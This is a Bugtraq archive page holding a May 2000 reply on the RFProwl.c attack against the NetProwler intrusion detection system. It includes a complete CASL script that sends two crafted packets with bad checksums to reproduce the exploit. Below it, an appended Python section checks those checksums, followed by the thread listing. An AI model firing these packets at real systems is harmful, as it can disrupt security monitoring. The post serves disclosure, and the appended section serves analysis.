Bugtraq mailing list archives
Re: RFP2K05: NetProwler vs. RFProwler
From: quinta () CERTBR COM BR (Pedro Quintanilha)
Date: Tue, 23 May 2000 20:38:47 -0300
A little more about... There is a CASL script that reproduces the RFProwl.c exploit. This exploit sends two packets with a wrong IP checksum, so I think that it's not a serious threat like remote attacks from the Internet, since most routers and firewalls will drop those packets.

[]'s
Pedro Quintanilha
quinta () certbr com br

=================================================
#include "tcpip.casl"
#include "packets.casl"

Src = pop args;
Dst = pop args;
Src = getip(Src);
Dst = getip(Dst);

iph = copy TCPIP;
iph.ip_version = 4;
iph.ip_headerlen = 5;
iph.ip_tos = 0;
iph.ip_length = 36;
iph.ip_id = 2233;
iph.ip_offset = 3;
iph.ip_ttl = 62;
iph.ip_protocol = 6;
iph.ip_cksum = 38648;
iph.ip_source = Src;
iph.ip_destination = Dst;

tch = copy SYN;
tch.tcp_source = 1026;
tch.tcp_destination = 2058;
tch.tcp_seqno = 2542901;
tch.tcp_ackno = 0;
tch.tcp_offset = 0;
tch.tcp_x2 = 1;
tch.tcp_syn = 1;
tch.tcp_window = 768;

pk1data = "\x00\x00\x00\x00\x00\x00";
packet = [ iph, tch, pk1data ];
ip_output(packet);

iph2 = copy TCPIP;
iph2.ip_version = 4;
iph2.ip_headerlen = 5;
iph2.ip_tos = 0;
iph2.ip_length = 44;
iph2.ip_id = 2239;
iph2.ip_mf = 1;
iph2.ip_ttl = 62;
iph2.ip_protocol = 6;
iph2.ip_cksum = 30445;
iph2.ip_source = Src;
iph2.ip_destination = Dst;

tch2 = copy SYN;
tch2.tcp_source = 1032;
tch2.tcp_destination = 21;
tch2.tcp_seqno = 2816737352;
tch2.tcp_ackno = 0;
tch2.tcp_x2 = 10;
tch2.tcp_syn = 1;
tch2.tcp_window = 32120;
tch2.tcp_cksum = 29341;

pk2data = "\x02\x04\x05\xb4\x00\x00";
packet = [ iph2, tch2, pk2data ];
ip_output(packet);
=================================================
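The post's argument rests on the hard-coded ip_cksum values being wrong, which is what makes a checksum-verifying router or firewall drop the packets before they reach the IDS. The following is an added example, not part of Pedro's message or of the CASL script: it rebuilds the two IPv4 headers from the field values in the script, computes the RFC 791 header checksum, and runs the same receiver-side check a forwarding device applies. The source and destination addresses (192.0.2.1 and 192.0.2.2) are assumed, since the script takes them from its arguments; ip_offset = 3 is read as a fragment offset of 3 with no flags and ip_mf = 1 as the More Fragments flag with offset 0.

```python
import struct
from ipaddress import IPv4Address

# Constructed inputs: the CASL script takes Src/Dst from argv; RFC 5737
# documentation addresses are assumed here so the example runs offline.
SRC, DST = "192.0.2.1", "192.0.2.2"

# IP header fields copied from the two packets in the CASL script.
# Assumption: ip_offset = 3 -> fragment offset 3, no flags (0x0003);
#             ip_mf = 1     -> More Fragments flag, offset 0 (0x2000).
SCRIPT_PACKETS = {
    "pk1": dict(length=36, ident=2233, flags_frag=0x0003, ttl=62, proto=6, cksum=38648),
    "pk2": dict(length=44, ident=2239, flags_frag=0x2000, ttl=62, proto=6, cksum=30445),
}


def ip_checksum(header: bytes) -> int:
    """RFC 791 header checksum: one's complement of the one's-complement sum
    of the 16-bit words. An odd-length buffer is padded with a zero byte."""
    if len(header) % 2:
        header += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(header) // 2), header))
    while total >> 16:                      # fold carries back into 16 bits
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def build_ipv4_header(length, ident, flags_frag, ttl, proto, cksum, src, dst) -> bytes:
    """Pack a 20-byte IPv4 header (version 4, IHL 5, TOS 0) with the given checksum field."""
    return struct.pack("!BBHHHBBH4s4s", 0x45, 0, length, ident, flags_frag,
                       ttl, proto, cksum, IPv4Address(src).packed, IPv4Address(dst).packed)


def correct_checksum(header: bytes) -> int:
    """Value the sender should have placed in bytes 10-11, computed with that field zeroed."""
    return ip_checksum(header[:10] + b"\x00\x00" + header[12:])


def header_checksum_ok(header: bytes) -> bool:
    """Receiver-side check as a router or firewall does it: summing the whole header,
    checksum field included, gives 0 exactly when the field is correct."""
    return ip_checksum(header) == 0


def check_script_checksums(src: str = SRC, dst: str = DST) -> dict:
    """Compare each packet's hard-coded ip_cksum with the value its header really needs."""
    results = {}
    for name, fields in SCRIPT_PACKETS.items():
        hdr = build_ipv4_header(src=src, dst=dst, **fields)
        results[name] = {
            "hardcoded": fields["cksum"],
            "correct": correct_checksum(hdr),
            "valid": header_checksum_ok(hdr),
        }
    return results


if __name__ == "__main__":
    for name, r in check_script_checksums().items():
        print(f"{name}: hardcoded 0x{r['hardcoded']:04x}, correct 0x{r['correct']:04x}, "
              f"passes receiver check: {r['valid']}")
```

With the assumed addresses neither hard-coded value passes the receiver check, so a hop that verifies the IP header checksum would discard both packets; only a device that forwards without verifying (or the IDS sniffing the same segment as the sender) would ever see them. Substituting the real test addresses into check_script_checksums() shows whether the original values were ever valid for that pair.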
Current thread:
- Re: RFP2K04: Mining BlackICE with RFPickAxe, (continued)
- Re: RFP2K04: Mining BlackICE with RFPickAxe Robert Graham (May 17)
- antisniff latest ("two times fixed") version still exploitable, l0phtl0phe-kid.c Sebastian (May 18)
- Re: antisniff latest ("two times fixed") version still exploitable, l0phtl0phe-kid.c Mudge (May 18)
- Re: RFP2K04: Mining BlackICE with RFPickAxe Matt (May 18)
- AUX Security Advisory on Be/OS 5.0 (DoS) visi0n (May 17)
- Re: RFP2K04: Mining BlackICE with RFPickAxe Andrew Lambeth (May 19)
- Remote Dos attack against Intel express 8100 router Dimuthu Parussalla (May 18)
- RFP2K05: NetProwler vs. RFProwler rain forest puppy (May 19)
- Key Generation Security Flaw in PGP 5.0 gec () ACM ORG (May 23)
- Filesystem vulnerability in AIX salme () US IBM COM (May 23)
- Re: RFP2K05: NetProwler vs. RFProwler Pedro Quintanilha (May 23)
- Security Vulnerability in Qpopper 2.53 (Upgrade to 3.0.2) Qpopper Support (May 23)
- Remote xploit for MDBMS |[TDP]| (May 24)
- HP Web JetAdmin Version 6.0 Remote DoS attack Vulnerability Ussr Labs (May 24)
- Re: RFP2K04: Mining BlackICE with RFPickAxe rain forest puppy (May 19)
- revised patches for kerberos vulnerability Tom Yu (May 19)
- Microsoft Security Bulletin (MS00-029) Microsoft Product Security (May 19)
- BindView Security Advisory: jolt2 - Remote DoS against NT, W2K, 9x BindView Security Advisory (May 19)
- Bugtraq Stats for the last 3 years available now. Alfred Huger (May 17)